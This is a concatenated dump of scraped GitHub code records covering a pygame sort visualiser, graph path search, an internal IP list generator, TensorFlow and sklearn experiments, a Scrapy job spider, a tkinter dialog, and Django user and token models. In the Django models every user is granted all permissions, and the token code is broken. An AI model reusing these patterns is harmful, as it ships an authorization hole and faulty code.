0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nGRAY = (128, 128, 128)\n\n# Draw the array on the screen\ndef draw_array():\n bar_width = WINDOW_WIDTH // ARRAY_SIZE\n bar_height_scale = (WINDOW_HEIGHT - FONT_SIZE) // max(array)\n for index, value in enumerate(array):\n bar_height = value * bar_height_scale\n bar_x = index * bar_width\n bar_y = WINDOW_HEIGHT - bar_height\n bar_color = WHITE if index != i and index != j else BLUE\n pygame.draw.rect(window, bar_color, (bar_x, bar_y, bar_width, bar_height))\n\n# Draw the current step on the screen\ndef draw_step():\n text = font.render(f\"Step {i * ARRAY_SIZE + j + 1}\", True, BLACK)\n window.blit(text, (10, 10))\n pygame.display.update()\n\n# Bubble Sort algorithm\ndef bubble_sort():\n global i, j, done\n if i == ARRAY_SIZE - 1:\n done = True\n return\n if j == ARRAY_SIZE - i - 1:\n i += 1\n j = 0\n if array[j] > array[j + 1]:\n array[j], array[j + 1] = array[j + 1], array[j]\n j += 1\n\n# Main loop\nwhile not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n \n # Update the array and display\n bubble_sort()\n window.fill(GRAY)\n draw_array()\n draw_step()\n pygame.display.update()\n\npygame.quit()\n","repo_name":"Sbussiso/Magic8Ball.py","sub_path":"Magic8Ball.py","file_name":"Magic8Ball.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74868428841","text":"import collections\n\n#empty dictionary\ndict = {}\ndict2 = {}\n\n#read input file\nf = open(\"input.txt\")\nalpha_list = [\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',\n 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'\n]\n\nval = 0\nfor line in f:\n new = []\n #print (val)\n inputline = line.split(\" \")\n #print (len(inputline))\n #print (inputline)\n for i in range(len(inputline)):\n if inputline[i] == '1':\n new.append(alpha_list[i])\n #print (new)\n dict[val] = new\n dict2[alpha_list[val]] = new\n #print (dict2)\n val += 1\n\n#print (\"Matrix in characters:\\n\", dict)\ndict2 = collections.OrderedDict(sorted(dict2.items()))\n#print dict2)\n\ninp1 = input('Input1: ')\ninp2 = input('Input2: ')\n#print (inp1,inp2)\nlst1 = []\nlst2 = []\nfor i in range(len(alpha_list)):\n #print (i)\n if alpha_list[i] == inp1:\n lst1 += dict[i]\n #print(\"appended1\")\n if alpha_list[i] == inp2:\n lst2 += dict[i]\n #print(\"appended2\")\n\n #print(\"List1: \", lst1)\n #print(\"List2: \", lst2)\n\n # print (\"Task 1 output: \", list(set(lst2).intersection(lst1)))\n\nwith open('output.txt', 'w') as o1:\n o1.write(\"Task 1 output: \" + str(list(set(lst2).intersection(lst1))))\n\n\n# find all path\ndef find_all_path(graph, start, end, path=[]):\n path = path + [start]\n #print(path)\n if (start == end):\n return [path]\n if not start in graph:\n return None\n paths = []\n for node in graph[start]:\n if node not in path:\n newpaths = find_all_path(graph, node, end, path)\n for newpath in newpaths:\n paths.append(newpath)\n return paths\n\n\n#print (find_all_path(dict2,inp1,inp2))\nlst = find_all_path(dict2, inp1, inp2)\n\nfor i in lst:\n l = len(lst) - 1\n if len(i) < l:\n l = i\n\n# print(\"Task 2 output: \", lst[l])\n\nwith open('output.txt', 'a') as o1:\n o1.write(\"\\nTask 2 output: \" + str(\"-\".join(str(x) for x in lst[l])))","repo_name":"arangates/usc-labs","sub_path":"lab2/social_network.py","file_name":"social_network.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14944634383","text":"import os\n\nf = open(\"ip_list.txt\", 'w')\n\nfor seg2 in range(204, 209):\n for seg3 in range(0, 31):\n for seg4 in range(2, 255):\n gen_ip = f\"10.{seg2}.{seg3}.{seg4}\"\n print(gen_ip, file=f)\n print(f\"Added ip address: {gen_ip}\")\n","repo_name":"TheOriginalBob0705/ping-ip-range","sub_path":"generate_ip.py","file_name":"generate_ip.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16007423619","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization, Activation, GlobalAveragePooling2D, Flatten, Dense, Lambda\nimport numpy as np\nfrom tensorflow import pad\nimport tensorflow as tf\nfrom tensorflow import keras\n# cnn without padding\ndef create_small_cnn_np(k,n_hidden=512):\n model = Sequential()\n model.add(BatchNormalization(input_shape=(k, k, 1)))\n model.add(Conv2D(n_hidden, kernel_size=k))\n model.add(Activation('relu'))\n model.add(GlobalAveragePooling2D())\n #model.add(Dense(2))\n model.add(Dense(2, activation=\"softmax\"))\n return model\n\ndef create_fcn(k, n_hidden=512):\n model = Sequential()\n model.add(BatchNormalization(input_shape=(k, k, 1)))\n model.add(Flatten())\n model.add(Dense(n_hidden, activation='relu'))\n model.add(Dense(2, activation='softmax'))\n\n return model\n\ndef circular_padding(x, padding_size):\n # Perform circular padding on the input tensor\n return tf.pad(x, [[0, 0], [padding_size, padding_size], [padding_size, padding_size], [0, 0]], mode='SYMMETRIC')\n\n\ndef create_small_cnn(k, n_hidden=512,kernel_size=17, padding_size=8):\n model = Sequential()\n model.add(BatchNormalization(input_shape=(k, k, 1)))\n model.add(Lambda(lambda x: circular_padding(x, padding_size)))\n model.add(Conv2D(n_hidden, kernel_size=17, padding='SAME')) #VALID\n model.add(Activation('relu'))\n model.add(GlobalAveragePooling2D())\n model.add(Dense(2, activation=\"softmax\"))\n\n return model\n\ndef create_dataset_dots(k=100):\n input_shape = (k, k)\n X_1 = np.zeros(input_shape)+0.5\n X_2 = X_1.copy()\n X_1[k//2][k//2]+=0.5\n X_2[k//2][k//2]-=0.5\n Xs = np.stack([X_1, X_2], axis=0)\n ys = np.array([1, 0])\n return Xs, ys\n\ndef train_dot_model(model, batch_X,batch_y,criterion,opt,LR):\n for idx in range(2000):\n total_loss = 0\n total_acc = 0\n\n with tf.GradientTape() as tape:\n output = model(batch_X, training=True)\n loss = criterion(batch_y, output)\n\n gradients = tape.gradient(loss, model.trainable_variables)\n opt.apply_gradients(zip(gradients, model.trainable_variables))\n\n total_loss += loss * tf.cast(tf.shape(batch_y)[0], dtype=tf.float32)\n total_acc += tf.reduce_sum(\n tf.cast(tf.math.argmax(output, axis=1) == tf.cast(batch_y, dtype=tf.int64), tf.float32)\n ).numpy()\n\n if (idx + 1) % 800 == 0:\n LR /= 10\n opt.learning_rate.assign(LR)\n\n if (idx + 1) % 100 == 0:\n print(\"Epoch: {}, Train Acc: {:.3f}, Loss: {:.3f}\".format(\n idx + 1, total_acc * 100. / batch_y.numpy().shape[0], total_loss / batch_y.numpy().shape[0]\n ))\n\ndef train_dot_model_no_verbose(model, batch_X,batch_y,criterion,opt,LR):\n for idx in range(2000):\n with tf.GradientTape() as tape:\n output = model(batch_X, training=True)\n loss = criterion(batch_y, output)\n gradients = tape.gradient(loss, model.trainable_variables)\n opt.apply_gradients(zip(gradients, model.trainable_variables))\n if (idx + 1) % 800 == 0:\n LR /= 10\n opt.learning_rate.assign(LR)","repo_name":"RandomAnass/Analysis-of-new-phenomena-in-deep-learning","sub_path":"functions/dots_models.py","file_name":"dots_models.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24424323501","text":"# Actualizado por:\n# Yeimmy Katherin Lugo \n# 05/06/2023\n\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser, BaseUserManager, UserManager, PermissionsMixin, Permission\nfrom django.contrib.auth.models import AbstractUser\nfrom django_resized import ResizedImageField\nfrom django.contrib.auth.validators import UnicodeUsernameValidator\nfrom datetime import timedelta\nfrom django.contrib.auth.models import Group\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django.utils import timezone\n\nclass UserManager(BaseUserManager):\n # Gestor de usuarios personalizado\n \n def create_user(self, username, email, password=None):\n # Crea y guarda un usuario regular\n \n # Verifica que se proporcione un email válido\n if not email:\n raise ValueError('El usuario debe tener un email válido.')\n \n # Crea una instancia del modelo de usuario con el nombre de usuario y el email normalizado\n user = self.model(\n username=username,\n email=self.normalize_email(email),\n )\n \n # Establece la contraseña proporcionada\n user.set_password(password)\n # Guarda el usuario en la base de datos utilizando la conexión especificada\n user.save(using=self._db)\n # Devuelve el usuario creado\n return user\n\n def create_superuser(self, username, email, password=None):\n # Crea y guarda un superusuario\n \n # Utiliza el método create_user para crear un usuario regular con los mismos parámetros\n user = self.create_user(\n username=username,\n email=email,\n password=password,\n )\n \n # Establece los atributos de superusuario\n user.is_staff = True\n user.is_superuser = True\n # Guarda el usuario en la base de datos utilizando la conexión especificada\n user.save(using=self._db)\n # Devuelve el usuario creado\n return user\n \n\nclass User(AbstractBaseUser, PermissionsMixin):\n # Campo para el nombre de usuario, debe ser único y tener un máximo de 255 caracteres.\n username = models.CharField(unique=True, max_length=255)\n # Campo para el email, debe ser único.\n email = models.EmailField(unique=True)\n # Campo para almacenar la última fecha y hora de inicio de sesión del usuario.\n last_login = models.DateTimeField(null=True, blank=True, auto_now=True)\n\n #nickname=models.CharField(max_length=55, unique=True)\n\n # Campo para indicar si el usuario está activo, con un valor predeterminado de True.\n is_active = models.BooleanField(default=True)\n # Campo para indicar si el usuario es personal de staff, con un valor predeterminado de False.\n is_staff = models.BooleanField(default=False)\n \n # Relación ManyToMany con el modelo Group para asignar grupos al usuario.\n groups = models.ManyToManyField(\n Group,\n verbose_name=_('groups'),\n blank=True,\n related_name='api_users'\n )\n \n # Relación ManyToMany con el modelo Permission para asignar permisos al usuario.\n user_permissions = models.ManyToManyField(\n Permission,\n verbose_name=_('user permissions'),\n blank=True,\n related_name='api_users'\n )\n \n # Instancia del gestor de usuarios personalizado.\n objects = UserManager()\n # Campo utilizado como nombre de usuario para la autenticación.\n USERNAME_FIELD = 'username'\n # Campos adicionales requeridos para crear un usuario.\n REQUIRED_FIELDS = ['email']\n \n def has_perm(self, perm, obj=None):\n # Método para verificar si el usuario tiene un permiso específico.\n # En este caso, siempre se devuelve True para conceder todos los permisos.\n return True\n\n def has_module_perms(self, app_label):\n # Método para verificar si el usuario tiene permisos en un módulo específico.\n # En este caso, siempre se devuelve True para conceder permisos en cualquier módulo.\n return True\n\n def __str__(self) -> str:\n # Método que devuelve una representación en cadena del usuario (en este caso, el ID).\n return str(self.id)\n \n\nclass TokensEmail(models.Model):\n token = models.CharField(max_length=6) # Campo de modelo que almacena un token de longitud máxima de 6 caracteres\n created_at = models.DateTimeField(auto_now_add=True) # Campo de modelo que registra la fecha y hora de creación del token\n expires_at = models.DateTimeField() # Campo de modelo que registra la fecha y hora de vencimiento del token\n is_valid = models.BooleanField(default=True) # Campo de modelo que indica si el token es válido o no (valor predeterminado: True)\n\n def is_expired(self):\n return self.expires_at <= timezone.now() # Método que verifica si el token ha expirado comparando su fecha de vencimiento con la hora actual\n\n def save(self, *args, **kwargs):\n if not self.expires_at:\n self.expires_at = timezone.now() + timedelta(minutes=10) # Si la fecha de vencimiento no está establecida, se establece 10 minutos en el futuro\n super().save(*args, **kwargs) # Llama al método `save()` de la clase base para guardar el objeto en la base de datos\n if self.is_valid and self.is_expired():\n self.is_valid = False # Si el token es válido pero ha expirado, se marca como no válido\n self.save() # Se vuelve a guardar el objeto para reflejar el cambio en el estado de validez\n\n @classmethod\n def create_token(cls):\n token_obj = cls.objects.filter(is_valid=True, expires_at__gte=timezone.now()).first()\n # Busca un objeto de token válido cuya fecha de vencimiento sea posterior o igual a la hora actual\n\n if token_obj:\n token_obj.expires_at = timezone.now() + timedelta(minutes=10)\n token_obj.save()\n # Si se encuentra un token válido, actualiza su fecha de vencimiento para extenderlo otros 10 minutos\n else:\n token = str(uuid4())\n token_obj = cls(token=token)\n token_obj.save()\n # Si no se encuentra un token válido, se crea uno nuevo con un valor UUID (identificador único universal) aleatorio\n\n return token_obj # Devuelve el objeto de token creado o actualizado\n\n @classmethod\n def clean_tokens(cls):\n tokens = cls.objects.filter(is_valid=True)\n # Obtiene todos los objetos de token que aún son válidos\n\n for token in tokens:\n if token.is_expired():\n token.is_valid = False # Si el token ha expirado, se marca como no válido\n token.save() # Se vuelve a guardar el objeto para reflejar el cambio en el estado de validez\n\n\n\n# @classmethod\n# def create_token(cls):\n# from uuid import uuid4\n# token = str(uuid4())\n# token_obj = cls(token=token)\n# token_obj.save()\n# return token_obj\n\n# @classmethod\n# def clean_tokens(cls):\n# tokens = cls.objects.filter(is_valid=True)\n# for token in tokens:\n# if token.is_expired():\n# token.is_valid = False\n# token.save()\n\n# @periodic_task(run_every=crontab(minute='*/10'))\n# def clean_tokens():\n# Token.clean_tokens()\n\n#Create your models here.\n\n\n\n\n\n\n# class CustomUserManager(BaseUserManager):\n# def create_user(self, email, password=None, **extra_fields):\n# if not email:\n# raise ValueError('The Email field must be set')\n# email = self.normalize_email(email)\n# user = self.model(email=email, **extra_fields)\n# user.set_password(password)\n# user.save(using=self._db)\n# return user\n\n# def create_superuser(self, email, password=None, **extra_fields):\n# extra_fields.setdefault('is_staff', True)\n# extra_fields.setdefault('is_superuser', True)\n# return self.create_user(email, password, **extra_fields)\n\n\n \n \n \n \n \n \n \n \n \n \n \n# class User(AbstractBaseUser, PermissionsMixin):\n# # username_validator = UnicodeUsernameValidator()\n# username = models.CharField(\n# ('username'),\n# max_length=150,\n# unique=True,\n# help_text=('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),\n# # validators=[username_validator],\n# error_messages={\n# 'unique': (\"A user with that username already exists.\"),\n# },\n# )\n# #first_name = models.CharField(('first name'), max_length=150, blank=True)\n# #last_name = models.CharField(('last name'), max_length=150, blank=True)\n\n# email = models.EmailField(('email address'), unique=True)\n# is_staff = models.BooleanField(\n# ('staff status'),\n# default=False,\n# help_text=('Designates whether the user can log into this admin site.'),\n# )\n# is_active = models.BooleanField(\n# ('active'),\n# default=True,\n# help_text=(\n# 'Designates whether this user should be treated as active. '\n# 'Unselect this instead of deleting accounts.'\n# ),\n# )\n# date_joined = models.DateTimeField(('date joined'), default=timezone.now)\n# email = models.EmailField(unique=True)\n# @classmethod\n# def create_user(cls, email):\n# if not email:\n# raise ValueError('The Email field must be set')\n# user = cls(email=email)\n# user.save()\n# return user\n# EMAIL_FIELD = 'email'\n# USERNAME_FIELD = 'email'\n# REQUIRED_FIELDS = ['username']\n# objects = CustomUserManager()\n# def __str__(self):\n# return self.email\n \n\n\n\n\n\n\n\n\n\n\n\n\n # def generate_otp(self):\n # import pyotp\n # totp = pyotp.TOTP('JBSWY3DPEHPK3PXP')\n # return totp.now()\n \n # username_validator = UnicodeUsernameValidator()\n\n # username = models.CharField(\n # ('username'),\n # max_length=150,\n # unique=True,\n # help_text=('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),\n # validators=[username_validator],\n # error_messages={\n # 'unique': (\"A user with that username already exists.\"),\n # },\n #)\n # first_name = models.CharField(('first name'), max_length=150, blank=True)\n # last_name = models.CharField(('last name'), max_length=150, blank=True)\n # email = models.EmailField(('email address'), unique=True)\n # is_staff = models.BooleanField(\n # ('staff status'),\n # default=False,\n # help_text=('Designates whether the user can log into this admin site.'),\n # )\n # is_active = models.BooleanField(\n # ('active'),\n # default=True,\n # help_text=(\n # 'Designates whether this user should be treated as active. '\n # 'Unselect this instead of deleting accounts.'\n # ),\n # )\n # date_joined = models.DateTimeField(('date joined'), default=timezone.now)\n\n # objects = UserManager()\n\n # EMAIL_FIELD = 'email'\n # USERNAME_FIELD = 'email'\n # REQUIRED_FIELDS = ['username']\n # nickname = models.CharField(max_length=55)\n # # profile_picture=ResizedImageField(upload_to,null=True,blank=True)\n \n # def __str__(self):\n # return self.email\n\n # def generate_otp(self):\n # import pyotp\n # totp = pyotp.TOTP('JBSWY3DPEHPK3PXP')\n # return totp.now()\n \n \n \n# class Project(models.Model):\n# id = models.AutoField(primary_key= True)\n# nombre = models.CharField('Nombre', max_length= 100)\n# descripcion = models.CharField('Descripcion', max_length= 500)\n\n \n\n# def __str__(self):\n# return f'{self.nombre} : {self.descripcion}'\n\n# class Device(models.Model):\n# nombre = models.CharField('Nombre', max_length= 100, primary_key= True)\n\n \n# def __str__(self):\n# return f'{self.nombre}'\n\n# class Template(models.Model):\n\n# namehardware = models.CharField('Namehardware', max_length=100, primary_key=500)\n# descripcionTemplate = models.CharField('Descripcion', max_length=500)\n \n# def __str__(self):\n# return f'{self.namehardware } : {self.descripcionTemplate}' ","repo_name":"PIANTAIOT/Pianta---IOT---Backend-","sub_path":"Pianta/ApiPianta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12266,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11778574154","text":"# Adding a point constraint #\n###############################\n\n# import BGE internal module\nimport PhysicsConstraints\n\n# get object list\nobj_list = bge.logic.getCurrentScene().objects\n\n# get object named Obj_1\nroot = obj_list[\"root\"]\nobj = obj_list[\"obj\"]\n\n# get object physics ID\nphido = obj.getPhysicsId()\n\n# get root physics ID\nphidr = root.getPhysicsId()\n\n# want to use point constraint type\nconstraint_type = 1\n\n# Use bottom right front corner of object for point constraint position\npoint_pos_x = 1.0\npoint_pos_y = -1.0\npoint_pos_z = -1.0\n\n# create a point constraint\nconst =\tPhysicsConstraints.createConstraint( phido, phidr, constraint_type, point_pos_x, point_pos_y, point_pos_z)\n\n# stores the new constraint ID to be used later\nobj[\"constraint_ID\"] = const.getConstraintId()\t\n\n\n\n# Removing a point constraint #\n#################################\n\n# import BGE internal module\nimport PhysicsConstraints\n\n# get object list\nobj_list = bge.logic.getCurrentScene().objects\n\n# get object 1\nobj = obj_list[\"obj\"]\n\n# get constraint ID that was saved as an obj property\n# when the constraint was created\nconstraint_ID = obj[\"constraint_ID\"]\n\n# remove constraint\nPhysicsConstraints.removeConstraint(constraint_ID)\n","repo_name":"zakharov/blenderColladaKinematics","sub_path":"models/blender/doc/python_api/alternative/examples/PhysicsConstraints.py","file_name":"PhysicsConstraints.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"8425341203","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import TencentItem\n\n\nclass TencentpositionSpider(scrapy.Spider):\n name = 'tencentPosition'\n allowed_domains = ['tencent.com']\n url = \"http://hr.tencent.com/position.php?start=\"\n offset = 0\n start_urls = [url + str(offset)]\n\n def parse(self, response):\n for each in response.xpath('//tr[@class=\"even\"] | //tr[@class=\"odd\"]'):\n # 初始化模型对象\n item = TencentItem()\n # 职位名称\n item['positionName'] = each.xpath(\"./td[1]/a/text()\").extract()[0]\n # 详情连接\n item['positionLink'] = each.xpath(\"./td[1]/a/@href\").extract()[0]\n # 职位类别\n item['positionType'] = each.xpath(\"./td[2]/text()\").extract()[0]\n # 招聘人数\n item['peopleNum'] = each.xpath(\"./td[3]/text()\").extract()[0]\n # 工作地点\n item['workLocation'] = each.xpath(\"./td[4]/text()\").extract()[0]\n # 发布时间\n item['publishTime'] = each.xpath(\"./td[5]/text()\").extract()[0]\n\n # 将数据发到管道文件\n yield item\n\n # scrapy里重新发请求(处理完一页之后重新发请求)\n if self.offset < 1680:\n self.offset += 10\n else:\n # break\n raise(\"结束工作\")\n # 请求处理下一页\n # callback 为回调函数\n yield scrapy.Request(url=(self.url + str(self.offset)), callback=self.parse)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aaqingsongyike/Python","sub_path":"Python_Reptlie_Scrapy/tencent/tencent/spiders/tencentPosition.py","file_name":"tencentPosition.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30491857908","text":"from sklearn.neural_network import MLPClassifier\nimport sklearn\nimport sknn\nfrom sklearn import datasets, linear_model\nfrom sklearn import neural_network\n\nimport numpy as np\nif __name__ == '__main__':\n dimension = 10\n num_actions = 2\n\n state_example = np.random.rand(4)\n state = [np.random.rand(4)for i in range(2)]\n\n phi_example = np.random.rand(dimension)\n test_phi = [np.random.rand(dimension) for i in range(2)]\n\n\n clf = neural_network.MLPRegressor(alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1)\n clf.fit(state, test_phi)\n\n test_phi = np.ones(dimension * num_actions)\n test_phi_new = np.zeros(dimension * num_actions)\n for i in range(int(len(test_phi_new) / num_actions)):\n test_phi_new[i] = 1.0\n\n test_phi = np.split(test_phi, num_actions)\n test = np.random.rand(4)\n test2 = np.random.rand(4)\n print(test)\n print(clf.predict([test]).flatten())\n print(clf.predict([test2])[0])\n\n\n\n","repo_name":"NEAT-RL/Expectation-Maximisation","sub_path":"skikit.py","file_name":"skikit.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34679649910","text":"\"\"\" View\n\"\"\"\nfrom urllib import urlencode\nfrom eea.googlecharts.widgets.view import View as Widget\n\nclass View(Widget):\n \"\"\" View portlet widget\n \"\"\"\n\n @property\n def width(self):\n \"\"\" Widget width\n \"\"\"\n return self.widget.get('dashboard', {}).get('width', 800)\n\n @property\n def height(self):\n \"\"\" Widget height\n \"\"\"\n return self.widget.get('dashboard', {}).get('height', 600)\n\n @property\n def src(self):\n \"\"\" Src\n \"\"\"\n query = {\n 'chart': self.widget.get('name', ''),\n 'width': self.width,\n 'height': self.height,\n }\n\n return u'%s/chart-full?%s' % (\n self.context.absolute_url(),\n urlencode(query)\n )\n","repo_name":"eea/eea.googlecharts","sub_path":"eea/googlecharts/widgets/chart/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"22381099029","text":"# https://leetcode.com/problems/k-closest-points-to-origin/\n\nimport heapq\n\n\nclass Solution:\n def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:\n min_heap = []\n for x, y in points:\n distance = x ** 2 + y ** 2\n min_heap.append((distance, x, y))\n heapq.heapify(min_heap)\n\n res = []\n for _ in range(k):\n _, x, y = heapq.heappop(min_heap)\n res.append([x, y])\n\n return res\n","repo_name":"shota-tech/leetcode","sub_path":"python/heap/973_k_closest_points_to_origin.py","file_name":"973_k_closest_points_to_origin.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29873669012","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\ndn = [-1, 0, 1, 0, 0, 0]\ndm = [0, 1, 0, -1, 0, 0]\ndh = [0, 0, 0, 0, 1, -1]\nM, N, H = map(int, input().split())\nboxes = []\nfor _ in range(H):\n box = [list(map(int, input().split())) for _ in range(N)]\n boxes.append(box)\n\ncnt = 0\ntomato = deque()\nvisited = [[[0] * M for _ in range(N)] for _ in range(H)]\nfor h in range(H):\n for n in range(N):\n for m in range(M):\n if boxes[h][n][m] == 1:\n visited[h][n][m] = 1\n tomato.append([h, n, m])\n elif boxes[h][n][m] == 0:\n cnt += 1\n\nans = 0\nwhile True and cnt:\n nx = []\n while tomato:\n h, n, m = tomato.popleft()\n for i in range(6):\n nh, nn, nm = h + dh[i], n + dn[i], m + dm[i]\n if nh < 0 or nh >= H or nn < 0 or nn >= N or nm < 0 or nm >= M:\n continue\n if visited[nh][nn][nm]:\n continue\n if boxes[nh][nn][nm] != 0:\n continue\n\n cnt -= 1\n visited[nh][nn][nm] = 1\n nx.append([nh, nn, nm])\n\n ans += 1\n if cnt == 0:\n break\n elif not nx:\n ans = -1\n break\n tomato = deque(nx)\n\nprint(ans)\n","repo_name":"essk13/Algorithm","sub_path":"01_problem/python/2022/02/0214/BAEKJOON_7569/7569_BAEKJOON.py","file_name":"7569_BAEKJOON.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4398984169","text":"import os\r\nfrom pathlib import Path\r\nfrom rich import print\r\nfrom joblib import Parallel, delayed\r\nfrom tqdm import tqdm\r\n\r\nimport utils\r\nimport visualization as vis\r\nimport metrics as ym\r\n\r\nimport cv2\r\n\r\n\r\ndef do_process(mdl_ndx, preprocessing):\r\n detection_name = f\"exp-incisive-{mdl_ndx}-{'y' if preprocessing else 'n'}\"\r\n\r\n pp = \"\" if not preprocessing else \"_pp\"\r\n\r\n # data_dir = Path(os.getcwd()).parent / \"results\"\r\n data_dir = Path(os.getcwd()) / \"src\" / \"utils\" / \"results\" / \"mg\"\r\n\r\n images_dir = data_dir / (\"images\" + pp)\r\n target_cont_dir = data_dir / (\"contours\" + pp) / \"test\"\r\n\r\n predicted_annotations_dir = data_dir / \"detect\" / detection_name / \"labels\"\r\n\r\n def process_image(file_name):\r\n image = utils.load_image(images_dir / f\"{file_name}.png\")\r\n [h, w] = image.shape[:2]\r\n target_cont = utils.load_relative_contours(target_cont_dir / f\"{file_name}.txt\")\r\n target_cont = [utils.r2a_contour(r, w, h) for r in target_cont]\r\n\r\n try:\r\n predicted_boxes = utils.load_relative_rectangles(\r\n predicted_annotations_dir / f\"{file_name}.txt\"\r\n )\r\n predicted_boxes = [\r\n utils.r2a_rectangle(rect, w, h) for rect in predicted_boxes\r\n ]\r\n except:\r\n predicted_boxes = []\r\n\r\n target_mask = utils.create_mask_from_contours(target_cont, w, h)\r\n predicted_mask = utils.create_mask_from_rectangles(predicted_boxes, w, h)\r\n return ym.evaluate(target_mask, predicted_mask)\r\n\r\n file_names = utils.list_file_names(images_dir)\r\n file_names = [f for f in file_names if \"_uns2_\" in f]\r\n\r\n results = Parallel(n_jobs=4)(delayed(process_image)(f) for f in tqdm(file_names))\r\n # results = (process_image(f) for f in tqdm(file_names))\r\n\r\n total_tp, total_tn, total_fp, total_fn = 0, 0, 0, 0\r\n for tp, tn, fp, fn in results:\r\n total_tp += tp\r\n total_fp += fp\r\n total_tn += tn\r\n total_fn += fn\r\n\r\n print(\"\")\r\n print(\"model: \", detection_name)\r\n print(\"using preprocessing: \", preprocessing)\r\n print(\"images dir: \", images_dir)\r\n print(\"tgt ann dir: \", target_cont_dir)\r\n print(\"prd ann dir: \", predicted_annotations_dir)\r\n # ---\r\n p, r, f1 = ym.p_r_f1(total_tp, total_tn, total_fp, total_fn)\r\n print(f\"[bold blue]P[/]\\t{p:.3f}\")\r\n print(f\"[bold blue]R[/]\\t{r:.3f}\")\r\n print(f\"[bold blue]F1[/]\\t{f1:.3f}\")\r\n\r\n\r\nmdl_index = 8\r\nif __name__ == \"__main__\":\r\n do_process(mdl_index, False)\r\n do_process(mdl_index, True)\r\n","repo_name":"rapaja/aiworkbench","sub_path":"src/incisive/scripts/backup/script_pointwise_prf1_cont.py","file_name":"script_pointwise_prf1_cont.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15359725426","text":"from tkinter import *\nfrom functools import partial # To prevent unwanted windows\n\nimport random\n\n\nclass Converter:\n def __init__(self):\n\n # Formatting Variables...\n background_color = \"light blue\"\n\n self.all_calc_list = ['123 degress F is 50.6 degrees C',\n '123 degress C is 253.4 degress F',\n '123 degress F is 50.6 degrees C',\n '123 degress C is 253.4 degress F',\n '123 degress F is 50.6 degrees C',\n '123 degress C is 253.4 degress F',\n '123 degress F is 50.6 degrees C']\n\n # self.all_calc_list = []\n\n\n # Converter Main Screen GUI...\n self.converter_frame = Frame(width=600, heigh=600, bg=background_color, pady=10)\n self.converter_frame.grid()\n\n self.temp_converter_label = Label(self.converter_frame, text=\"Temperature Converter\",\n font=(\"Arial\", \"16\", \"bold\"),\n bg=background_color,\n padx=10, pady=10)\n self.temp_converter_label.grid(row=0)\n\n self.export_button = Button(self.converter_frame, text=\"export\"\n , font=(\"Arial\", \"14\"),\n padx=10, pady=10, command=lambda: self.export\n (self.all_calc_list))\n self.export_button.grid(row=1)\n\n if len(self.all_calc_list) == 0:\n self.export_button.config(state=DISABLED)\n\n def export(self, calc_export):\n Export(self, calc_export)\n\n\nclass Export:\n def __init__(self, partner, calc_export):\n\n background = 'white'\n\n partner.export_button.config(state=DISABLED)\n\n self.export_box = Toplevel()\n\n self.export_box.protocol('WM_DELETE_WINDOW', partial(self.close_export,partner))\n\n self.export_frame = Frame(self.export_box, width=300, bg=background)\n self.export_frame.grid()\n\n self.how_heading = Label(self.export_frame, text=\"Calculation export\",\n font='arial 10 bold', bg=background)\n self.how_heading.grid(row=0)\n\n self.export_text = Label(self.export_frame,\n text=\"Enter a filename in the\"\n \"box below and press the\"\n \"save button to save your\"\n \"calculation history to a\"\n \"text file\"\n , justify=LEFT, width=40,\n bg=background, wrap=250)\n self.export_text.grid(row=1)\n\n # Entry Box for file name goes here...\n self.filename_entry = Entry(self.export_frame,\n width=20, font=\"Arial 14 bold\", justify=CENTER)\n self.filename_entry.grid(row=3, pady=10)\n\n self.export_dismiss_frame = Frame(self.export_frame)\n self.export_dismiss_frame.grid(row=4, pady=10)\n\n self.save_button = Button(self.export_dismiss_frame, text=\"Save\",\n font=\"Arial 12 bold\")\n self.save_button.grid(row=0, column=0)\n\n self.dismiss_button = Button(self.export_dismiss_frame, text=\"Dismiss\",\n font=\"Arial 12 bold\",\n command=partial(self.close_export, partner))\n 